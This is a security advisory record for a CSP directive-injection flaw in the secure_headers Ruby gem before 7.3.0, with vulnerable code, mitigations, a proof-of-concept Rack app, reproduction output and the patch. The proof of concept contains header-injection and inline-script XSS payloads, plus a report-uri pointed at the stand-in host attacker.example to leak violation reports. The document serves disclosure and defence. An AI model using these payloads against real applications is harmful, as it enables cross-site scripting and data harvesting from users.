{"id":"CVE-2026-54163","aliases":["GHSA-rqq5-2gf9-4w4q"],"title":"Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when given untrusted input","summary":"Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when given untrusted input","severity":"medium","cvss":4.7,"cwe":["CWE-79","CWE-113"],"vendor":"secure_headers","product":"secure_headers","ecosystem":"rubygems","affected":["secure_headers < 7.3.0"],"patched":["secure_headers 7.3.0"],"published":"2026-07-10","updated":"2026-07-10","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-rqq5-2gf9-4w4q","references":[{"url":"https://github.com/github/secure_headers/security/advisories/GHSA-rqq5-2gf9-4w4q"},{"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2026-54163.yml"},{"url":"https://www.cve.org/CVERecord/SearchResults?query=CVE-2026-54163"},{"url":"https://github.com/advisories/GHSA-rqq5-2gf9-4w4q"}],"tags":["ghsa","rubygems"],"ingestedAt":"2026-07-10T21:06:31.385Z","slug":"CVE-2026-54163","body":"## Overview\n\n## Summary\n\n`secure_headers` builds the `Content-Security-Policy` value by stitching every configured directive together with `; ` separators. Three directive builders (`build_sandbox_list_directive`, `build_media_type_list_directive`, `build_report_to_directive`) interpolate caller-supplied strings into that value without scrubbing `;`, `\\r`, or `\\n`.\n\nWhen an application forwards untrusted input into `SecureHeaders.override_content_security_policy_directives` (or `append_…`) for `:sandbox`, `:plugin_types`, or `:report_to`, an attacker can embed a literal `;` and inject an arbitrary CSP directive into the header value. Because `:sandbox` and `:plugin_types` both sort alphabetically before `:script_src` in `BODY_DIRECTIVES`, the injected `script-src` lands earlier in the header and wins under the [CSP first-occurrence rule](https://www.w3.org/TR/CSP3/#parse-serialized-policy), defeating the application's real `script-src`. End result: an `'unsafe-inline' *` policy is forced for inline `<script>` despite the configured strict CSP, giving full XSS reachability anywhere reflected or stored content meets one of these three sinks.\n\nAn existing `;`/`\\n` scrub is already present in the source-list builder (`build_source_list_directive`), but the three sibling builders here never received the same treatment and still emit caller bytes verbatim into the CSP value.\n\n## Impact\n\nAlthough piping untrusted input into CSP directives is generally discouraged, applications that do so for one of the three uncovered directives turn that endpoint into an XSS sink with an effective `*` `'unsafe-inline'` `script-src`, even though the global config says `script_src: %w('self')`. The same primitive can also be used to point `report-to` / `report-uri` at attacker infrastructure to silently siphon CSP violation reports — which include the violated URL, blocked-uri, source-file, line-number and a sample-snippet, useful for fingerprinting and for harvesting victim-internal URLs.\n\nThe global default CSP set in `Configuration.default` is supposed to be a backstop: even if a controller appends a single risky value, the strict `script-src` should remain the first match. This bug breaks that property by letting the appended value redefine the policy header upstream of the legitimate `script-src`.\n\n## Affected\n\n- **Package:** `secure_headers` (RubyGems)\n- **Vulnerable versions:** `<= 7.2.0`\n- **Patched version:** `7.3.0`\n\nApplications that set `:sandbox`, `:plugin_types`, or `:report_to` only from static configuration (no per-request or per-tenant input) are not exploitable and need only the version bump. Applications that pipe any user-controlled value into one of those three directives via the per-controller override APIs are exploitable and should both upgrade and audit those code paths.\n\n## Mitigations / Workarounds\n\nUntil upgrading to **7.3.0**, sanitize any user-controlled input before passing it to:\n\n- `SecureHeaders.override_content_security_policy_directives`\n- `SecureHeaders.append_content_security_policy_directives`\n- `SecureHeaders.use_content_security_policy_named_append`\n\nfor `:sandbox`, `:plugin_types`, or `:report_to`. Reject or strip `;`, `\\r`, and `\\n` from values destined for these directives before they reach the gem.\n\n## Vulnerable code\n\nThree sibling builders all join an attacker-controllable value into the CSP header value with no `;` / `\\r` / `\\n` scrubbing.\n\n- [`content_security_policy.rb#L72-L93`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L72-L93) — `build_sandbox_list_directive`:\n\n```ruby\nelsif sandbox_list && sandbox_list.any?\n  [\n    symbol_to_hyphen_case(directive),\n    sandbox_list.uniq\n  ].join(\" \")\nend\n```\n\n- [`content_security_policy.rb#L95-L103`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L95-L103) — `build_media_type_list_directive` (same pattern, for `plugin-types`).\n- [`content_security_policy.rb#L105-L110`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L105-L110) — `build_report_to_directive`:\n\n```ruby\ndef build_report_to_directive(directive)\n  return unless endpoint_name = @config.directive_value(directive)\n  if endpoint_name && endpoint_name.is_a?(String) && !endpoint_name.empty?\n    [symbol_to_hyphen_case(directive), endpoint_name].join(\" \")\n  end\nend\n```\n\nFor comparison, [`content_security_policy.rb#L117-L129`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/content_security_policy.rb#L117-L129) shows the source-list builder that already performs the scrub the three above are missing.\n\nValidation also does not catch it:\n\n- [`policy_management.rb#L361-L371`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L361-L371) — `validate_sandbox_expression!` only checks `v.start_with?(\"allow-\")`, so `\"allow-scripts allow-same-origin; script-src 'unsafe-inline' *\"` passes.\n- [`policy_management.rb#L376-L385`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L376-L385) — `validate_media_type_expression!` uses `/\\A.+\\/.+\\z/`; `.` matches `;` and `'`, so `\"application/x-foo; script-src 'unsafe-inline' *\"` passes.\n- [`policy_management.rb#L410-L417`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers/headers/policy_management.rb#L410-L417) — `validate_report_to_endpoint_expression!` only checks `String` + non-empty.\n\n## Reachable\n\nThe three sinks are reached by the documented public override APIs in [`lib/secure_headers.rb#L61-L106`](https://github.com/github/secure_headers/blob/f224144c99002bcd3c06ed86c169429d4be1e5dc/lib/secure_headers.rb#L61-L106) — `override_content_security_policy_directives`, `append_content_security_policy_directives`, and `use_content_security_policy_named_append`. These are the documented per-controller hooks Rails apps use to vary CSP per request (e.g. allowing an iframe domain that a user just configured, sandboxing a per-tenant subdocument, or wiring up a per-tenant reporting endpoint).\n\nConcrete reachable shapes:\n\n1. Multi-tenant SaaS persisting a tenant-chosen iframe sandbox policy and replaying it via `override_content_security_policy_directives(sandbox: [tenant.sandbox_tokens])`.\n2. Document / PDF viewer that allows tenants to whitelist a custom MIME via `plugin_types: [tenant.allowed_mime]`.\n3. Reporting integration that lets the operator name the active reporting group through an admin UI and forwards it via `report_to: params[:report_group]`.\n\nIn all three patterns, a string field that the app expects to be a single token (`allow-forms`, `application/pdf`, `default`) is the injection point.\n\n## Proof of concept\n\nPinned reproduction against a minimal Rack app on `secure_headers 7.2.0`, `rack 3.2.6`, `rackup 2.3.1`, `webrick 1.9.2`. Browser verification uses headless Chromium.\n\nInstall (Bundler):\n\n```ruby\n# Gemfile\nsource \"https://rubygems.org\"\ngem \"secure_headers\", \"= 7.2.0\"\ngem \"rack\",           \"= 3.2.6\"\ngem \"rackup\",         \"= 2.3.1\"\ngem \"webrick\", \"= 1.9.2\"\n```\n\n```bash\nbundle install\n```\n\nDriver (`poc_e2e.rb`):\n\n```ruby\nrequire \"rack\"\nrequire \"webrick\"\nrequire \"rackup\"\nrequire \"rackup/handler/webrick\"\nrequire \"secure_headers\"\n\nSecureHeaders::Configuration.default do |c|\n  c.csp = {default_src: %w('self'), script_src: %w('self'), style_src: %w('self')}\nend\n\nINLINE_XSS = \"<script>document.body.appendChild(Object.assign(\" \\\n             \"document.createElement('div'),{id:'pwn',innerText:\" \\\n             \"'XSS-EXECUTED via '+location.pathname}));</script>\"\n\nclass App\n  def call(env)\n    req = Rack::Request.new(env)\n    case req.path_info\n    when \"/sandbox\"  # Vector A\n      SecureHeaders.override_content_security_policy_directives(req,\n        sandbox: [\"allow-scripts allow-same-origin; script-src 'unsafe-inline' *\"])\n    when \"/plugin\"   # Vector B\n      SecureHeaders.override_content_security_policy_directives(req,\n        plugin_types: [\"application/x-foo; script-src 'unsafe-inline' *\"])\n    when \"/report\"   # Vector C (report-uri exfil)\n      SecureHeaders.override_content_security_policy_directives(req,\n        report_to: \"default; report-uri https://attacker.example/leak\")\n    when \"/control\"  # Negative — same payload on a source_list directive\n      SecureHeaders.override_content_security_policy_directives(req,\n        frame_src: [\"'self'\", \"evil.example; script-src 'unsafe-inline' *\"])\n    end\n    body = \"<!doctype html>#{INLINE_XSS}\"\n    [200, {\"content-type\"=>\"text/html\"}.merge(SecureHeaders.header_hash_for(req)), [body]]\n  end\nend\n\nRackup::Handler::WEBrick.run(\n  Rack::Builder.new { use SecureHeaders::Middleware; run App.new },\n  Host: \"127.0.0.1\", Port: 14567, AccessLog: [], Logger: WEBrick::Log.new(nil, 0))\n```\n\nRun:\n\n```bash\nbundle exec ruby poc_e2e.rb\n```\n\n### End-to-end reproduction against `secure_headers 7.2.0`\n\nServer-side observation (`curl -s -D - http://127.0.0.1:14567/<path>`):\n\n```\nGET /sandbox  -> content-security-policy:\n    default-src 'self'; sandbox allow-scripts allow-same-origin;\n    script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'\n\nGET /plugin   -> content-security-policy:\n    default-src 'self'; plugin-types application/x-foo;\n    script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'\n\nGET /report   -> content-security-policy:\n    default-src 'self'; script-src 'self'; style-src 'self';\n    report-to default; report-uri https://attacker.example/leak\n\nGET /control  -> content-security-policy:\n    default-src 'self'; frame-src 'self' evil.example  script-src\n    'unsafe-inline' *; script-src 'self'; style-src 'self'\n```\n\nBrowser verification (headless Chromium, `--dump-dom`, grep for the injected `id=\"pwn\"` element which is only present if the inline `<script>` actually ran):\n\n```\nGET /sandbox  -> pwn element PRESENT  (XSS executed, injected script-src wins)\nGET /plugin   -> pwn element PRESENT  (XSS executed, injected script-src wins)\nGET /report   -> pwn element absent   (this vector enables report-uri exfil,\n                                       not script execution by itself)\nGET /control  -> pwn element absent   (existing scrub on the source-list\n                                       builder rewrites ; -> space, so the\n                                       legitimate `script-src 'self'` is\n                                       still the first match)\n```\n\nPatched-build verification: applying the patch and re-running the same three vectors flips `/sandbox` and `/plugin` to \"pwn element absent\". The injected `;` is replaced with a space, so the trailing `script-src 'unsafe-inline' *` collapses into the parent directive's value list instead of becoming a sibling directive, and the legitimate `script-src 'self'` stays the first `script-src` the parser encounters.\n\n## Patch\n\nShipped in **7.3.0** as a private helper that scrubs `;`, `\\r`, and `\\n` from every directive value, applied uniformly across the three previously-uncovered builders and the source-list builder.\n\nSketch of the shipped change in `lib/secure_headers/headers/content_security_policy.rb`:\n\n```ruby\nDIRECTIVE_INJECTION_REGEX = /[\\n\\r;]/.freeze\n\ndef scrub_directive_value(directive, value)\n  str = value.to_s\n  if str =~ DIRECTIVE_INJECTION_REGEX\n    Kernel.warn(\"#{directive} contains a #{$~[0].inspect} in #{str.inspect} which will raise an error in future versions. It has been replaced with a blank space.\")\n    str.gsub(DIRECTIVE_INJECTION_REGEX, \" \")\n  else\n    str\n  end\nend\n```\n\nThe helper is invoked from each builder against the **joined** directive value (not per-token), so a single Kernel.warn is emitted per directive regardless of how many offending bytes the input contains. The same helper now also wraps the existing source-list scrub.\n\nSee the merged fix PR for the full patch and tests.\n\n## Credit\n\nReported by [@tonghuaroot](https://github.com/tonghuaroot).\n\n## Resources\n\n- CVE-2020-5217 — prior `secure_headers` advisory for the same bug class on `build_source_list_directive` (the 2020 fix that motivated the helper this advisory extends).\n- [W3C CSP Level 3 — Parse a serialized CSP](https://www.w3.org/TR/CSP3/#parse-serialized-policy) — defines the first-occurrence rule that makes the alphabetical-ordering exploit work.\n- [RFC 7230 §3.2.4 — Field parsing](https://www.rfc-editor.org/rfc/rfc7230#section-3.2.4) — context for why bare `\\r` / `\\n` in HTTP header values are unsafe regardless of directive separator semantics.\n\n## Affected packages\n\n- `secure_headers < 7.3.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `secure_headers 7.3.0`","depth":"sunlit","depthScore":26,"depthScoreParts":{"impact":25.9,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}